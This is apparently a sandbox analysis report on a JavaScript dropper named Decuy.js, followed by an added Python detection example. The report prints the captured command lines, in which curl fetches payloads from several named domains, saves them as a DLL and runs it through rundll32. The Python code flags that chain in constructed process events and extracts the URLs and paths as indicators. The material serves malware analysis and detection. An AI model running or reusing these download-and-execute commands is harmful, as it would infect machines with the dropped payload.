Analysis

  • max time kernel
    1s
  • max time network
    125s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win11-20231215-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    22/12/2023, 13:25

General

  • Target

    Decuy.js

  • Size

    64KB

  • MD5

    1d3f6ed7311735a444d6476a38e7aee1

  • SHA1

    417c149545b2540c77a795570fbfff6c8e97dc17

  • SHA256

    3f0abcafae8954ff4b4638efb83a7e286bf8aa2876032dab9f778cb91b74c984

  • SHA512

    b297ec60eb79203726445c43dd01d2eebb417d0376b85c3250391297df72ce56687f0ce032724d4fba3ea1364cfe624f923dc994e2e2be64f3bf87c9dc4e9be5

  • SSDEEP

    768:U0lkTF16szQM0NHMSK6Plp7lx1VghlNm7PUKmeHlRGcZgx/4jYx0WAdl2Albhcoz:U0USszFKEkcp2EUfgK4ze3nKT7EcVW

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Decuy.js
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    PID:4848
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacigkoftesiparis.com/ViUbB/0.7020556503286075.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
      PID:1160
      • C:\Windows\system32\curl.exe
        curl https://adanacigkoftesiparis.com/ViUbB/0.7020556503286075.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
        3⤵
        PID:3108
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacamasiryikama.com/BDs19Ul/0.04543440912800589.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
      PID:4952
      • C:\Windows\system32\curl.exe
        curl https://adanacamasiryikama.com/BDs19Ul/0.04543440912800589.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
        3⤵
        PID:784
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl 0.42531560385772815.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
      PID:2728
      • C:\Windows\system32\curl.exe
        curl 0.42531560385772815.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
        3⤵
        PID:3540
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
      2⤵
      PID:4744
      • C:\Windows\system32\timeout.exe
        timeout 10
        3⤵
        • Delays execution with timeout.exe
        PID:4260
      • C:\Windows\system32\rundll32.exe
        rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter
        3⤵
        PID:3300
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl 0.7380442988907985.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
      PID:1312
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://kartvizitfiyatlari.com/rLhb/0.1779644560948916.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
      PID:3636
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://mexicopostalcode.com/51h6Kn/0.21997761945762384.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
      PID:1264
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://ucakbiletsorgulama.com/U14/0.6387453064165083.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
      2⤵
      PID:424
  • C:\Windows\system32\curl.exe
    curl https://mexicopostalcode.com/51h6Kn/0.21997761945762384.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
    1⤵
    PID:2928
  • C:\Windows\system32\curl.exe
    curl https://ucakbiletsorgulama.com/U14/0.6387453064165083.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
    1⤵
    PID:5052
  • C:\Windows\system32\curl.exe
    curl 0.7380442988907985.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
    1⤵
    PID:2804
  • C:\Windows\system32\curl.exe
    curl https://kartvizitfiyatlari.com/rLhb/0.1779644560948916.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll
    1⤵
    PID:2252
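The process tree above is the whole story of this dropper: a script host (wscript.exe) spawns cmd.exe to fetch a payload with the built-in curl.exe, writes it as a .dll under a freshly created directory in C:\, sleeps with timeout.exe, then runs the DLL through rundll32 with the export name Enter. The following detection pass is an added example (not part of the sandbox report or its tooling). It runs over a handful of constructed process-creation records, modelled on Sysmon Event ID 1 fields, whose command lines and PIDs are copied from the tree; the parent of the curl.exe record is assumed to be cmd.exe 1160 (the report leaves several curl processes unattributed), and the final benign curl record is invented as a control. The rule names and thresholds are this example's own.

```python
"""Flag the wscript -> cmd -> curl --output *.dll -> timeout -> rundll32 chain
from the Decuy.js report and pull the network/file IOCs out of it.
Added example; constructed events, not a real log export."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+")
OUTPUT_RE = re.compile(r"--output\s+(\S+)", re.I)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+(?P<dll>[^,\s"]+),(?P<export>\w+)', re.I)
TRUSTED_DLL_ROOTS = ("c:\\windows\\", "c:\\program files")

# Constructed records (pid, ppid, image, command line). PIDs and command lines
# follow the report; the curl.exe parent (1160) and the last benign record are assumed.
EVENTS = [
    {"pid": 4848, "ppid": 1000, "image": r"C:\Windows\system32\wscript.exe",
     "cmd": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\Decuy.js"},
    {"pid": 1160, "ppid": 4848, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl https://adanacigkoftesiparis.com/ViUbB/0.7020556503286075.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll'},
    {"pid": 3108, "ppid": 1160, "image": r"C:\Windows\system32\curl.exe",
     "cmd": r"curl https://adanacigkoftesiparis.com/ViUbB/0.7020556503286075.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll"},
    {"pid": 4744, "ppid": 4848, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter'},
    {"pid": 4260, "ppid": 4744, "image": r"C:\Windows\system32\timeout.exe", "cmd": "timeout 10"},
    {"pid": 3300, "ppid": 4744, "image": r"C:\Windows\system32\rundll32.exe",
     "cmd": r"rundll32 C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll,Enter"},
    # Benign control (invented): curl run from an interactive shell, no script-host ancestor.
    {"pid": 7000, "ppid": 6000, "image": r"C:\Windows\system32\curl.exe",
     "cmd": r"curl https://example.invalid/readme.txt --output C:\Users\Admin\readme.txt"},
]


def basename(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Image names from the process itself up to the root we know about."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def under_script_host(events, pid):
    """True when any ancestor (not the process itself) is a script host."""
    return any(a in SCRIPT_HOSTS for a in ancestors(events, pid)[1:])


def detect(events):
    """Return (pid, rule) hits for the three stages of the chain."""
    hits = []
    for e in events:
        name, cmd = basename(e["image"]), e["cmd"]
        if name == "curl.exe" and under_script_host(events, e["pid"]):
            m = OUTPUT_RE.search(cmd)
            if m and m.group(1).lower().endswith(".dll"):
                hits.append((e["pid"], "script-host-curl-dll-download"))
        if name == "timeout.exe" and under_script_host(events, e["pid"]):
            hits.append((e["pid"], "script-host-timeout-delay"))
        if name == "rundll32.exe":
            m = RUNDLL_RE.search(cmd)
            if m and not m.group("dll").lower().startswith(TRUSTED_DLL_ROOTS):
                hits.append((e["pid"], "rundll32-nonstandard-dll"))
    return hits


def extract_iocs(events):
    """URLs and drop paths from curl under a script host, exports from rundll32."""
    urls, paths, exports = set(), set(), set()
    for e in events:
        name = basename(e["image"])
        if name == "curl.exe" and under_script_host(events, e["pid"]):
            urls.update(URL_RE.findall(e["cmd"]))
            m = OUTPUT_RE.search(e["cmd"])
            if m:
                paths.add(m.group(1))
        elif name == "rundll32.exe":
            m = RUNDLL_RE.search(e["cmd"])
            if m:
                exports.add(m.group("export"))
    return {"urls": sorted(urls), "drop_paths": sorted(paths), "exports": sorted(exports)}


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"{rule}: pid {pid}")
    print(extract_iocs(EVENTS))
```

The ancestry walk is what keeps the benign curl record quiet: the download rule fires on curl writing a .dll only when a script host sits somewhere above it, which is the shape of this sample rather than of an administrator at a prompt. Note that the report itself shows four curl.exe processes at level 1 with no parent, so a real hunt over EDR telemetry should also key on the unusual output directory and the rundll32 export name, not on parentage alone.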

Network

MITRE ATT&CK Enterprise v15
